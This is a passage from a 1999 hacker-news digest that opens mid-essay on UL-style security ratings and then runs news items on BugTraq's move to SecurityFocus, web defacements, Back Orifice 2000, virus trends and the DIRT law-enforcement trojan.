Detection of a cyber intrusion is typically NOT very obvious to those who come into work on Monday. Because of this fact, safe-crackers have very limited time to crack a vault. Hackers on the other hand, have unlimited time to crack a system. Once they get in, safe crackers typically REMOVE items which then become 'missing'. Hackers typically COPY items unless their motives are political rather than financial, leaving the originals and the system intact. For cyber intrusions to become less surreptitious, intrusion detection needs to mature and become more widely deployed if 'time' is to be a meaningful factor in the process. The commercial model is based around the storage of valuables, particularly jewelry and cash. In addition to the (American) UL standards (TL-15, TL-30, TRTL-30, TRTL-15/6, TRTL-30/6, TXTL-60), there is a German standard (A,B,C1,C2,D 10, D20, E 10) and a Scandinavian standard (60-80, 80-100, 100-120, 120-140, 140-160, 160-180, 180-200, 200-240, 240-280, 280-320, 320-360). All three are based on time and tools. Time and tools is an excellent set of criteria for rating computer security components in areas such as encryption. In America, the various insurance agencies determine what rating is required for them to insure a given amount to be stored in the safe or vault. In Europe, the Dutch Safe Rating Committee publishes a similar standard assigning a range of financial value to each rating in each of the three systems. This does not, however, address liability for storage of information such as credit ratings, social security numbers, bank balances, web surfing preferences, political affiliations, which is subject not only to theft but to alteration or even just surreptitious access. When storing sensitive information, a more appropriate place to look for examples is to the government. Classified information presents many of the same requirements for storage that sensitive information on the public or even commercial interests does. To meet the U.S.
Government's needs in this area, General Services Administration (GSA) has published standards (classes 1-8, black, red, green and blue labels) which rate storage containers for everything from weapons to information processing systems to filing cabinets. They additionally publish information on storage of confidential, secret, and top-secret materials in GSA Approved (or Non-GSA Approved) containers. This information includes additional requirements for alarm systems, restricted building access, guard check points, etc... Specifics on GSA classes and labels are seemingly difficult to come by. Based on the information I have found in the document library of locks.nfsec.navy.mil/document_library/guides however, much of what has been worked out by the GSA could potentially serve as a foundation for developing similar standards for the storage of information on the public. The U.S. Department of Commerce has commissioned the National Institute of Standards and Technology (NIST) to maintain FIPS PUB 140-1, Security Requirements For Cryptographic Modules. The document sets forth a standard for specification of cryptographic-based security systems protecting unclassified information. It provides for product ratings from 1 to 4 with 1 being lame and 4 being k-rad. This range is designed to cover a wide range of data sensitivity, from 'low value administrative data' to 'million dollar funds transfers' to 'life protecting data'. The standard is typically utilized for devices which protect tokens or encrypt data such as crypto boxes. While this system may or may not be successful in real life, it certainly deserves closer examination in that it represents what may be the closest thing that the U.S. Government has to UL for computer security products. Under the FIPS 140-1 Testing and Validation model, vendors select an accredited FIPS 140-1 testing lab, submit their 'module' for testing and pay the testing fee. 
The lab then tests the product for conformance to FIPS 140-1 and passes a report on the 'module' to NIST/CSE for validation. Throughout this process, the lab may submit questions for guidance and clarification to NIST/CSE. If the report is favorable, a validation certificate is issued by NIST/CSE for the 'module'. The certificate is presented to the vendor through the lab and the 'module' is added to the published list of Validated FIPS 140-1 Modules. The problem may stem from the difference between UL's roots and those of ICSA and CISSP. It certainly manifested itself in the fact that the UL is the only one providing non-biased product inspections as well as accountability for the quality of the installations out there in the field. Requirements for the use of 'listed' intrusion detection systems, encryption mechanisms, and companies could on its own make an impact if that listing actually meant something. The use of strict procedures and specific levels of physical security could be required as in the GSA model and this too could help the private sector. This has not been the tack taken to date, however. The second problem is that manufacturers of physical security devices are pressured by customers to have a UL listing. This is because customers are pressured by insurance underwriters to use products that meet UL specifications. In Cyberspace, businesses currently feel that the embarrassment and loss of public trust are more costly than the actual damage caused by hackers. Citibank has become the most well-known example of what happens when computer intrusions are made public knowledge. By taking commendable actions and not covering up the intrusion, Citibank is now known as the bank that got hacked instead of the bank that handled the situation appropriately. Since silence seems to be the best policy, cyber merchants choose to 'eat' their losses rather than risk the negative publicity.
Until these losses become intolerable and insurance is necessary, there may be no motivation to drive the certification, approval or listing of products by UL or any similar organization. It took UL about 30 years from being subsidized by the insurance agencies to being self-supporting off fees paid by manufacturers for testing. Merrill was the first full-time employee as a result of this change. Insurance underwriters and Consumer Product Safety Commission were instrumental in gaining public acceptance of UL work. It was the public's safety that was of concern and liability drove companies to insure. Insurance underwriters found they were then saddled with the problem and addressed it effectively with the UL. Perhaps at some point the collection and storage of information on the public will carry some sort of liability with it.

A Call for Action

Without a call for action, I would simply be a whiner. At this point, you the reader can assist with very little effort. Whether you are a vendor, insurance company, end user, or hacker, let me know your thoughts on the state of the industry, the state of the UL and/or this article's conclusions. As a hacker, is the relationship between the hot-shot safe crackers and the UL an attractive one you would be interested in? Is the UL listing process for installations sufficient? Will it encounter problems unforeseen by this article? As an insurer, am I missing part of the picture; are companies actually insuring their computer systems and data to mitigate loss or liability? As a manufacturer do you foresee problems with the UL model being imposed on computer security products? As an end user do you feel that computer security is important? Do you feel that the current system actually is sufficient? Have you been wanting something better or do you feel that you are being slighted by my insinuation that you do not fully understand the products you purchase?
Any and all feedback on this article would be appreciated no matter where it comes from (although manufacturer comments will be taken with a grain of salt). Forward those comments to tan@l0pht.com. If there is enough feedback, I may write a follow up article on this topic. I am considering going into detail on each rating system UL, German, Scandinavian, GSA and FIPS 140-1, highlighting overlaps with the computer security discipline. Thanks to the UL for providing documentation on the history of the UL and directing me to Peter Tallman of the Melville, N.Y. office. Thanks to Peter Tallman for clarifying some of the issues surrounding the listing of safes and alarm systems and directing me to Beverly Borowski whom I hope can assist me in my future research. Also of use to date was FED-STD-809, the federal standard for neutralization and repair of GSA approved containers as well as a yearly publication by the Dutch Safe Rating Committee called 'Recommendations for Insuring Money in Safes and Strongrooms'. GSA's web site (www.gsa.gov) provides a searchable index of federal standards including FED-STD-809. The Dutch Safe Rating Committee is at Stichting Kwaliteitsbeoordeling Brandkasten (SKB), P.O. Box 85764, 2508 CL The Hague, The Netherlands - Tel. 070-3912008. Additional thanks to the researchers at the L0pht for their assistance, particularly to Brian Oblivion for providing extensive documentation on FIPS 140-1.

@HWA

20.0 BugTraq Moves To SecurityFocus
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 29th
From HNN http://www.hackernews.com/

contributed by Aleph One

BUGTRAQ, the premier security mailing list, will officially be moving from its current home at Netspace.org to Securityfocus.com on July 5th. Security Focus will be a major security web site featuring complete BugTraq archives, Daily News, vulnerability information and lots lots more.
Security-Focus http://www.securityfocus.com InfoWorld http://www.infoworld.com/articles/op/xml/990628opswatch.xml Security Watch | Stuart McClure and Joel Scambray Portals open on security landscape AS SECURITY GROWS into a major concern for IT shops, a number of online security portals have sprouted up. These offer nearly everything you'll need to manage security at your site. A number of Web pages have begun in the last couple of months, but the most impressive ones are just now opening. We have frequented many in our security travels, and we think that Securityfocus.com, a site debuting the week of June 26, looks the most promising for providing comprehensive and one-stop security information. Since we started Security Watch more than a year ago, we've seen our column's name borrowed by a number of people. Now you'll have to add Securitywatch.com, in Belgium, to that list (www.securitywatch.com). According to its semiveiled Web page, the site will debut July 5 and will offer the usual security news, products, trends, jobs, literature, and links. But, like Securityfocus.com, Securitywatch.com also promises a vulnerability database. The depth and breadth of its vulnerability archive remains to be seen, however, as we have yet to receive an offer to preview this site (surprise, surprise). One of the earliest collections of security resources on the Internet came from SecuriTeam.com. The site has been available for more than a few months and offers security news, reviews, exploits, and tools. Although its content isn't as complete or as well organized as that of some others, it offers a decent set of security resources and timely vulnerabilities that we have frequented and highly recommend checking out. SecurityPortal.com has been around for a number of months and offers a fairly good set of security content including a weekly column, security news, discussion forums, services, a research center (links and resources), and even an online store. 
It also offers a centralized location to search for computer security jobs at all the major career sites, including Career Builder, Career Mosaic, and Monster Board.

SecureZone.com is a relative newcomer and at first glance looks much like a general search engine. The site offers a variety of security information and resources, and even allows you to add your URL to its site. But unlike Securityfocus.com and Securitywatch.com, SecureZone does not offer its own vulnerability database. Also, we experienced delays when using the site; be prepared for a wait. The site is run by En Garde Systems (www.engarde.com), the product vendor that offers the nifty security software T-Sight and IP-Watcher.

The heavy hitter

Combine the Bugtraq archive (www.geek-girl.com), Packet Storm's exploits and tools (www.genocide2600.com/~tattooman), and Hacker News Network's timely news (www.hackernews.com), and you'll barely scratch the surface of the content provided on Securityfocus.com (www.securityfocus.com). The new Web site should be up this week and will offer one of the best collections of security resources available on the Internet. We got a sneak peek at this site and were duly impressed.

For starters, Securityfocus.com offers one of the most up-to-date security news sections available. Also included on the site are security tools, products, books, an events calendar, and forums. But unlike many of its competitors, Securityfocus.com offers a robust -- and free -- vulnerability database. The site also lets you query for only the technology that's important to you. For example, if you're primarily a Solaris 2.51 shop running Netscape Enterprise Server, you can query only the relevant vulnerabilities. You can personalize the entire Web site by selecting the type of news, calendar events, products, tools, and vulnerabilities you care about. Securityfocus.com will also provide a free applet for your desktop that will warn you as soon as a relevant vulnerability is released.
Securityfocus.com is the brainchild of the original Secure Networks group. The team created the Ballista security scanner product (now named CyberCop Scanner from Network Associates) and has discovered numerous product vulnerabilities on its own. Aleph One, the moderator and caretaker of the Bugtraq mailing list (one of the most widely subscribed computer lists in the world), has added his muscle to the site in offering the entire Bugtraq archive as part of the vulnerability database. Also, the entire Bugtraq mailing list will be moved to Securityfocus.com so archives can be searched.

After witnessing the birth of so many security portals on the Internet during the past year, we can't help but wonder what's next for the security community. Personally, we wouldn't mind seeing the paging service that warns administrators about new vulnerabilities the minute they become public, or maybe the downloading of daily security news to your Pilot with AvantGo (www.avantgo.com). In any case, the future is definitely bright for security professionals. Check out these portals and let us know which ones you'll be visiting at security_watch@infoworld.com.

Stuart McClure is a senior manager and Joel Scambray is a manager at Ernst & Young's eSecurity Solutions group. They have managed information security in academic, corporate, and government environment

@HWA

21.0 MS Gives Out Pirate Dough
~~~~~~~~~~~~~~~~~~~~~~~~~~

June 29th
From HNN http://www.hackernews.com/

contributed by Code Kid
Microsoft is planning to give away up to $25 million over the next five years, or half of its proceeds from its antipiracy efforts, toward technology access and education projects around the world. MS estimates that it will receive approx $10 million in civil and criminal antipiracy proceeds annually over the next five years.

Wired
http://www.wired.com/news/news/business/story/20469.html

Microsoft Shares Piracy Loot
Reuters 3:00 a.m.
29.Jun.99.PDT Microsoft plans to give away half its proceeds from efforts to crack down on software piracy, or at least US$25 million over the next five years, a company executive said. Brad Smith, general counsel for worldwide sales and support for Microsoft, said the software company is seeing a growing stream of revenue from settlements and criminal penalties assessed against counterfeiters. See also: Germany Jails Software Pirate "Obviously we rely heavily on law enforcement for support," Smith said. "Given that support from the public sector, we felt it was proper to share some of these recoveries with the communities that, like the company, are suffering from piracy." He said that Microsoft, which had $14.5 billion in revenues last year, expects at least $10 million in civil and criminal antipiracy proceeds annually over the next five years, although he said the company is spending more than that on efforts to enforce software laws. Smith said piracy is not necessarily growing, but authorities are increasing their enforcement in part because many large counterfeiting operations are connected to organized crime. "The reason we go after it so much is because we're cutting off a major source of funding for criminal syndicates," said Marc Frank, a Westminster, California, police sergeant who heads the multi-agency Asian Organized Crime Task Force. "It's not because we're the Microsoft police," he said. "It's because we're hitting the organized criminal syndicate where it hurts them -- in the pocketbook." The task force's efforts culminated this year with a raid on a factory in the southern California city where officers found $2.5 million in manufacturing equipment and more than $40 million worth of counterfeit Microsoft Windows, Office, and other programs. A total of 11 people have been arrested or indicted in connection with the raid, Frank said. Microsoft's donations will go toward technology access and education projects around the world, Smith said. 
Copyright© 1999 Reuters Limited.

@HWA

22.0 Biometrics comes to Home Shopping
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 29th
From HNN http://www.hackernews.com/

contributed by RickDogg
The Home Shopping Network will introduce biometric security to a large variety of consumers when it launches its voice-print technology next month. This new technology will enable HSN to automatically identify customers by their voice. This will allow repeat customers to order products faster and will allow HSN to create a very accurate customer database.

Wired
http://www.wired.com/news/news/technology/story/20460.html

Giving Voice to Net Security
by Leander Kahney
3:00 a.m. 29.Jun.99.PDT

The Home Shopping Network next month will be able to automatically identify customers on the phone by their voices. In the first large-scale deployment of its kind, HSN's speech-print service will allow frequent shoppers to dispense with passwords and personal identification numbers, the company said.

See also: Biometric Banking Bides Time

Voice recognition is just the first step: HSN said it hopes to completely automate the ordering process by the end of the year. Based on technology from Nuance Communications, the voiceprint system will ask callers for their phone numbers. Callers will then be passed on to human order-takers to complete the purchase.

"[Voice-recognition systems] are a lot more convenient for the customer and can save the company a lot of money," said Steve Ehrlich, Nuance's vice president of marketing. Automated phone-ordering systems can cost 90 percent less than conventional, human-operated systems, according to Ehrlich, who said Charles Schwab will roll out a similar system later this year. He said the technology handles a number of languages and copes well with regional accents and things like bad phone lines and stuffy noses.
In addition to convenience, the technology will help HSN build a detailed database of its customers, said Bill Meisel, editor and publisher of the Speech Recognition Update, a monthly newsletter. Currently, a household is issued a single verification number by HSN. The voiceprint technology will allow the company to identify and collect data on individual members in a household, Meisel said. "These are the kind of subtle advantages that make fraud prevention almost a secondary consideration," he said.

However, Meisel said the voiceprint system will be more secure than using a verification number. To crack the system would require a wiretap to obtain an accurate recording of someone's voice, Meisel said. It should not be possible to simply use a tape recorder. "The process of taping a voice changes its acoustic characteristics," he said. "It wouldn't work with a tape recorder ... practically speaking, it's very difficult [to crack the system]." Meisel said similar voice-recognition systems are in use in prisons, where calling rights are a form of prison commerce.

@HWA

23.0 Palm VII Revealed
~~~~~~~~~~~~~~~~~

June 29th
From HNN http://www.hackernews.com/

contributed by Kingpin
Too poor to buy a Palm VII? Don't want to risk your new toy? Well one brave soul has taken apart his Palm VII, taken pictures, and posted them to the web. A nice treat for you hardware guys.

The Gadgeteer
http://www.the-gadgeteer.com/palmvii-guts.html

@HWA

24.0 Who Is HNN?
~~~~~~~~~~~

June 29th
From HNN http://www.hackernews.com/

contributed by Space Rogue
A lot of people have asked just who is it that runs HNN and keeps the place together. We have created a page to answer just that question. The page even has pictures and everything.

Who Is HNN?
http://www.hackernews.com/misc/whorwe.html

HNN will be packing up shop and heading for Las Vegas sometime around Wednesday next week. We will do what we can to update the site remotely but the updates may be periodic at best.
Besides who is going to be around to read HNN if everyone is at Defcon?

@HWA

25.0 AntiOnline on the trail of f0rpaxe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From www.antionline.com

AntiOnline Tracks F0rpaxe
Tuesday, June 29, 1999 at 14:00:15
by John Vranesevich - Founder of AntiOnline

AntiOnline investigations into the recent wave of attacks being done by a group known as 'F0rpaxe' has led to the discovery of the true-life-identity of the group's leader, aka m1crochip. F0rpaxe is known to have broken into over 130 servers in the past two months, belonging to dozens of different organizations, including:

    NASA Goddard Space Flight Center
    US Navy
    US Coast Guard
    US Department of Agriculture
    US Department of the Interior
    University of Wisconsin
    Harvard University
    University of Colorado
    Georgetown University
    University of Michigan
    UC Davis

F0rpaxe officially 'Declared War' against the US government after the FBI raided several malicious hackers, including individuals known to be members of the 'gH' hacking group, which is believed to be responsible for attacks against the White House's Website. F0rpaxe released a statement earlier this month which read in part:

    We think that FBI should explain what a fuck they are doing. For the moment we wont destroy the servers we hack but if it is necessary we can burn alot of servers.

M1crochip, along with several other F0rpaxe members, have been featured in several publications, including MSNBC and Wired News. F0rpaxe's latest attack took place yesterday, against servers at UCLA. AntiOnline was able to gain the name and phone number of m1crochip, who lives in the city of Perafita, Portugal, shortly after a request for information came in.

Note: AntiOnline will not release information on this individual to the general public.
@HWA

26.0 Critical NOAA Web Site Attacked
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 30th
From HNN http://www.hackernews.com/

contributed by Mortel
The Storm Prediction Center, an arm of the National Oceanic and Atmospheric Agency (NOAA) was defaced yesterday. While the site was primarily used to distribute severe weather warnings, that information was available from other sources such as the National Weather Service. Unfortunately NOAA chose to run critical services such as email on the same machine so when they took down the server to correct the defacement their email was also off line creating severe disruptions in office work flow.

HNN Cracked Pages Archive
http://www.hackernews.com/archive/crackarch.html

Fox News
http://www.foxnews.com/js_index.sml?content=/scitech/wires2/0629/t_rt_0629_40.sml

MSNBC
http://www.msnbc.com/news/284765.asp

Computer World
http://www.computerworld.com/home/news.nsf/all/9906292noaahac

Andover News
http://www.andovernews.com/cgi-bin/news_story.pl?3570/topstories

Correction: 1615EST
We have been informed that the email server was not on the same machine as the web server but was taken offline as a precautionary measure until the extent of the attack could be determined.

Fox;

Hackers Hit Storm Prediction Web Site
8:16 p.m. ET (017 GMT) June 29, 1999

NORMAN, Okla. — Computer hackers vandalized the Web page of the top U.S. weather agency's storm prediction center Tuesday in the latest of a rash of attacks on government Internet sites, officials said.

The attack blocked the Internet weather warnings of the Storm Prediction Center, an arm of the National Oceanic and Atmospheric Agency (NOAA), at a time of year when powerful thunderstorms and tornadoes can break out across the Plains states.

"If there were severe weather already happening at that time of morning, it could have been a problem for a lot of people,'' Dr Joseph Schaeffer, director of the Storm Prediction Center, told Reuters.
Hackers calling themselves the "Keebler Elves'' deleted the Storm Prediction Center homepage (www.spc.noaa.gov) and replaced it with their own page declaring "Learn to fear the elite''. Schaeffer said the same storm forecasts were available elsewhere, including from the National Weather Service. But he said the blockage was an inconvenience to emergency management officials, who are used to quick and easy Internet access to the center's updated weather maps and other data. The attack was discovered at 3:00 a.m. EDT (0700 GMT) by someone trying to find weather data and reported quickly, so storm center technical staffers shut down the Web page. Repairing the damage and tracing and recording the hacker's steps for potential future criminal prosecution would keep the Web site down until late Tuesday, officials said. The damage also shut down the Web page of NOAA's Severe Storm Laboratory (www.ssl.noaa.gov), which is next door to the storm prediction center in Norman, Oklahoma. The Internet pages for both centers are run from the same computer, which was invaded by the hackers. The U.S. Army earlier Tuesday said it had launched a criminal investigation into an electronic break-in of its main Internet site, but stressed that hackers did not breach military security or operations. A hacker group also broke into four U.S. Department of Agriculture Web sites over the weekend, the USDA said. Military and other government officials have voiced major concern over repeated break-ins in the past year by electronic wizards anxious to simply show their hacking ability or to actually steal secrets. In March, a Pentagon-sponsored study ordered by Congress in 1995 concluded that military computer and communications systems were increasingly vulnerable to attack by hackers and high-tech enemies. 
-=-

Computer World;

Weather Web site hit by intruders
By Kathleen Ohlson

The National Oceanic and Atmospheric Administration's (NOAA) Storm Prediction Center became the latest Web target of hackers when one or more intruders broke into the site.

Both the site and e-mail for the Storm Prediction Center, based in Norman, Okla., were taken down as soon as the infiltration was detected, said Tim Tomastik, the NOAA's deputy director of public affairs in Washington.

Tomastik said the attack on the federal weather service forced its clients and customers to go to other sites for weather data. "It's weather data," he said. "There's no national security involved. I have no idea why they would go after it."

Officials are still trying to determine what, if any, damage was done to the site by the intrusion. So far, they know that some "real minor goofing with the text occurred," but nothing major, Tomastik said.

Yesterday, the U.S. Army Web site was breached (see story) and the home page defaced.

Tomastik said the NOAA is evaluating its system and expects federal authorities to look into what happened. The site is expected to be back up later today.

@HWA

27.0 Back Orifice 2000 is on its Way
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 30th
From HNN http://www.hackernews.com/

contributed by RickDogg
Set to be released on July 10th at Defcon, Back Orifice 2000 is already making news. The new version of Back Orifice will run on NT, be much harder to detect and have a very robust plugin architecture.

Wired
http://www.wired.com/news/news/technology/story/20493.html

Back Orifice 2000
http://www.bo2k.com

Wired;

Coming Soon: Back Orifice 2000
by Niall McKay
3:00 a.m. 30.Jun.99.PDT

An underground computer security group is poised to release a new version of a notorious software program that could allow crackers to watch and listen in on Windows-based PC users.

The Cult of the Dead Cow said it will release Back Orifice 2000 on 9 July -- at the annual Def Con convention in Las Vegas.
"This will demonstrate that Microsoft's operating systems are completely insecure and a bad choice for consumers and businesses who demand privacy," said Oxblood Ruffian, a former United Nations consultant and current Cult of the Dead Cow spokesman. See also: Back Orifice a Pain in the ...? http://redirect.wired.com/redir/10025/http://www.wired.com/news/news/technology/story/14092.html Def Con is perhaps the most unusual gathering in the computer security field. Hackers, crackers, and self-proclaimed security experts will mingle with media, security professionals, federal law enforcement officers, and "script kiddies" who deface Web pages with prefab cracking code. Security groups of all stripes use the occasion to release software and show off gadgets. But Back Orifice 2000 is perhaps the most anticipated item. Unlike previous versions of the software, Back Orifice 2000 will run on Windows NT and feature strong encryption and a modular architecture that the group said will allow hackers and other security groups to write plug-ins. The program will be released as open source to encourage further development by the security community. Back Orifice, released at last year's Def Con, may allow malicious users to monitor and tamper with computers without the permission or knowledge of their owners. The program is classified as a Trojan Horse because crackers need to dupe the user into installing an application on their hard disk. Despite this, Oxblood Ruffian said that the program is currently installed on up to a half-million PCs worldwide. Though that number could not be independently verified, an Australian computer security group last November said that 1,400 Australian Internet accounts have been compromised by Back Orifice. Back Orifice 2000 also promises to be a great deal more difficult to detect than its predecessor because it enables users to configure its port setting. 
Previously, intrusion detection and antivirus programs could detect Back Orifice because it used a default port setting of 3113. (Er that should read 31337 -Ed) A Microsoft Windows NT Server security manager said the company is closely monitoring Back Orifice development and is working with antivirus and intrusion detection software vendors to provide customers with utilities to combat the software. "Trojan Horses are not technological issues but a social engineering problem because they rely on the ability of the cracker to trick the user into running an application," said Scott Culp. "It's just a fact of computer science that if you run a piece of code on your machine you run the risk making your system vulnerable." The solution, according to Culp, is to ensure that users do not install any software from untrusted sources and regularly update antivirus and intrusion detection programs. Also at the show, independent security consulting firm L0pht Heavy Industries will release Anti-Sniffer, a network monitoring tool, and will announce B00te Call, a PalmPilot War Dialer. Such programs will automatically dial telephone numbers in sequence, looking for modems. Zero-Knowledge Systems is also expected to provide further details about Freedom, a network of servers promising total online anonymity. Def Con will also feature some of its legendary sideshow attractions, such as the Spot the Fed contest. In this game, conference attendees are invited to point out suspicious attendees who may be working for federal law enforcement agencies. Winners will be awarded an "I spotted the Fed" T-shirt. Other diversions include a fancy dress ball, Hacker Jeopardy, and the Hacker Death Match, a game that enables hackers to take their flame mails out of cyberspace and into reality by dressing up in giant inflatable Sumo suits to do battle. Well-heeled attendees are invited to a US$100 outing to Cirque du Soleil. 
Meanwhile, the conference will include sessions on how to detect wiretaps; the art and science of enemy profiling; hacking ethics, morality, and patriotism; cyber-forensic analysis; and a talk on the practice of hiring hackers as security consultants.

@HWA

28.0 Support for Web Security Spec Announced
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 30th
From HNN http://www.hackernews.com/

contributed by RickDogg
Microsoft and HP have announced their support for the HTTP/1.1 Message Digest Authentication specification. This new specification published by the Internet Engineering Task Force last month proposes the use of MD5 instead of SSL for password traffic.

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,408287,00.html

@HWA

29.0 Pentagon Investigates Computer Security Breach
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 30th
From HNN http://www.hackernews.com/

contributed by RickDogg
An employee of the Defense Threat Reduction Agency is under investigation by the Air Force Office of Special Investigations for allegedly seeking unauthorized access to the computer system of a coworker. Evidently the employee requested access to a senior official's computer while the official was away. The request was denied and no access was gained.

San Jose Mercury News
http://www.sjmercury.com/breaking/docs/020735.htm

Posted at 9:22 a.m. PDT Tuesday, June 29, 1999

Defense employee faces probe over computer incident

WASHINGTON (AP) -- The Pentagon said today it is investigating an attempted computer security breach last week at a defense agency responsible for reviewing sensitive technology exports.

An unidentified employee of the Defense Threat Reduction Agency is under investigation for allegedly seeking unauthorized access to the computer system of a coworker, agency spokesman Clem Gaines said.
Gaines said the employee under investigation by the Air Force Office of Special Investigations had requested access to the government computer used by Peter Leitner, a senior advisor to the defense agency on matters involving exports of sensitive technologies. Gaines declined to identify the individual.

The individual's request for use of Leitner's computer was denied and there was no security breach, Gaines said. The unauthorized request for access to Leitner's computer was made June 24, while Leitner was on Capitol Hill testifying before the House Committee on Government Reform, Gaines said.

Leitner has rankled some in the Pentagon by charging that senior defense officials have glossed over concerns in the lower ranks that U.S. businesses were allowed to sell China and other countries technology with military applications.

Gaines, the agency spokesman, said he could not discuss any details of the computer security investigation, which was requested Monday by the agency's director, Jay Davis. Pending the outcome of the investigation, the individual has been temporarily assigned to other duties, which Gaines did not specify.

@HWA

30.0 What will the Next Generation of Viruses Bring?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 30th
From HNN http://www.hackernews.com/

contributed by Deepquest
Melissa and WormExplorer were devastating to business and governments world wide. As viruses get more sophisticated and virus writers get more creative what sort of viruses can the world expect to see in the next six months or a year?

BBC
http://news.bbc.co.uk/hi/english/sci/tech/newsid_381000/381054.stm

Sci/Tech

New virus spills your beans

Virus threatens document security

A new strain of computer virus could distribute your highly confidential documents all over the Internet. Anti-virus developers are warning that they cannot develop an antidote until the virus appears. Far from destroying vital files, the virus will make sure everyone can see them.
The new virus is expected to be a variant of either Melissa or the Explore.Zip worm, both of which have cost businesses millions in recent weeks. Both Melissa and the Explore.Zip worm rely on people opening email attachments. Once into the computer the virus sends a message to everyone in the victim's in-box and then destroys every file written in Microsoft Word, Excel or Powerpoint, among others. New virus on the block One variant has already appeared. PrettyPark replicates itself by sending copies to everyone in the victim's address book. It waits silently until the victim is on the Internet, then sends lists of the victim's user names, password files and address lists to Internet Relay Chat channels. Anti-virus developers are expecting the next step to be a virus which roots around in your files and then posts your documents across the Internet. "The virus wouldn't be able to tell which of your documents are secret. It might just post your shopping list, or it could be a highly sensitive company document. "What's more, it would appear as if you sent it," says Graham Cluley of Sophos Anti-Virus. Several anti-virus makers already have an answer to PrettyPark. But they cannot build a defence against future variants until they encounter them. Java and ActiveX - next infection target It is predicted that the next generation of viral infections will hit small Webpage programmes called applets, written in Java and ActiveX. A recent survey revealed that more than half of medium-sized organisations using an intranet had no security policy in place to respond to the threat of attacks on Java applets. Recent estimates indicate that Melissa, Explore.Zip and other malicious attacks have cost US business $7.6bn this year alone. The viruses cannot infect Macintosh or Unix systems. 
@HWA

31.0 DIRT still Around, Used by Law Enforcement
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 30th
From HNN http://www.hackernews.com/

contributed by wannabe
We have all heard of BO (Back Orifice) or NetBus but what about DIRT? DIRT stands for Data Interception by Remote Transmission and is a commercial software package only available to law enforcement officials. DIRT, like BO and NetBus, allows remote control of a PC with or without the user's knowledge. Unfortunately this article makes no mention of whether it is necessary for law enforcement to get a search warrant before they use such a tool.

PC World
http://www.pcworld.com/pcwtoday/article/0,1510,11614,00.html

Correction 1615EST
Evidently the above story does mention that a search warrant is needed before law enforcement can use this tool. Unfortunately we missed that information. The story does mention that Frank Jones thinks that the Cult of the Dead Cow stole the idea for Back Orifice after seeing a DIRT demo. We have received staunch denials of this accusation from several members of cDc.

PC World;

Getting DIRT on the Bad Guys
Here's the ultimate weapon in the war against cyber crime.
by Tom Spring, PC World
June 29, 1999, 12:23 p.m. PT

To former detective Frank Jones, "secure network" is an oxymoron. The word "delete" isn't in his vocabulary. Password-protect your computer and you'll make his day. And if you really get on Jones' bad side, he'll take complete control of your PC--and your first clue will be when you open your door and the boys in overcoats start flashing badges at you.

If you're among the anonymous thousands of cyber bad guys who inhabit the Internet's underbelly, Jones is your worst nightmare. The retired New York City detective works on the law enforcement sidelines building software tools to help the government and police crack down on online criminals. And his latest tool is considered the ultimate weapon.
Digging up DIRT Jones wrote the widely used, but little-known software program called DIRT. The program works like a telephone wiretap for computers, giving its users the ability to monitor and intercept data from any Windows PC in the world. DIRT stands for Data Interception by Remote Transmission and was originally created by Jones as a tool to help snare online child pornographers. But in the short time it has been available only to government and law enforcement agencies, DIRT is now used to battle hacker groups like Cult of the Dead Cow and to trap terrorists, drug dealers, money launderers, and spies. "What we do is give law enforcement an additional line of defense," says Jones, the president of Codex Data Systems. The DIRTy Details The client side version of the DIRT program is less than 20KB in size and is typically installed on a target PC using a Trojan horse program (a set of instructions hidden inside a legitimate program). The DIRT program is usually sneaked inside an e-mail attachment, a macro, or a workable program that a targeted user is enticed to download. Once inside a target Windows 95/98/NT computer, it gives law enforcement complete control of the system without the user's knowledge. It starts off by secretly recording every keystroke the user makes. The next time the user goes online, DIRT transmits the log for analysis. Jones says government agencies have even managed to open encrypted files by obtaining password locks. During a recent program demonstration, Jones easily uploaded and downloaded files to a DIRT-infected computer connected to the Net by a dial-up modem. Jones could upload and download files to the PC without a hint of activity on the other end. Arresting Developments If you think this sounds like B-grade fiction, it isn't. During a recent meeting of high-ranking federal and state gumshoes, DIRT received glowing software reviews. Many cited long lists of arrests thanks to Codex. 
One police detective said DIRT has become a powerful tool in fighting crime online. It aids criminal investigations and results in about one arrest each month. Most of those arrested were suspected pedophiles, he said.

The hardest part of using DIRT, say its users, is getting owners of targeted computers to download the Trojan horse programs. Typically law enforcement tries to entice a targeted individual to download a program or a compressed file that must be "un-zipped" which contains the DIRT bug inside.

Because the program is not available to the public, DIRT is undetectable using virus scanning software, Jones said.

"The only way to avoid DIRT is to ignore your e-mail," he says.

Fighting Fire With Fire

Jones says law enforcement desperately needs these tools to turn the tide in its battle against online crime. "Law enforcement is outgunned," he says.

In an age where hacking horror stories have become front-page news, DIRT gives law enforcement an effective tool to even the score and catch the bad guy.

On one recent occasion DIRT was used to track a suspected drug dealer as he zigzagged across the country from client to client selling methamphetamines. His big mistake, police say, was keeping a client list on his laptop and logging into the Net each night to stay in touch with business associates and friends.

Using DIRT, police tracked his whereabouts each night and took notes on who his associates were. The alleged drug dealer was eventually arrested as he was surfing the Net in a San Jose, California motel room.

A Form of Flattery?

Though DIRT is restricted to military, government, and law enforcement agencies, the "Back Orifice" hacker tool offers some similar tricks. Jones maintains that its inventor, a member of the hacking group Cult of the Dead Cow, attended Codex's first public demonstration of DIRT more than a year ago and slapped together an "imitation" of DIRT based on what he saw.

"Close, but no cigar," Jones says.
But according to Mike Hudack, editor of Aviary-mag.com, an online magazine for hackers, there's more to Back Orifice than that. An updated version called "Back Orifice 2000" is expected to hit the Web in July.

Big Brotherware?

Hudack says the technological Cold War between white-hat hackers and black-hat hackers is just beginning--and law enforcement needs all the help it can get.

But others view DIRT as a potential threat to privacy, raising serious legal and ethical questions as a means of gathering information.

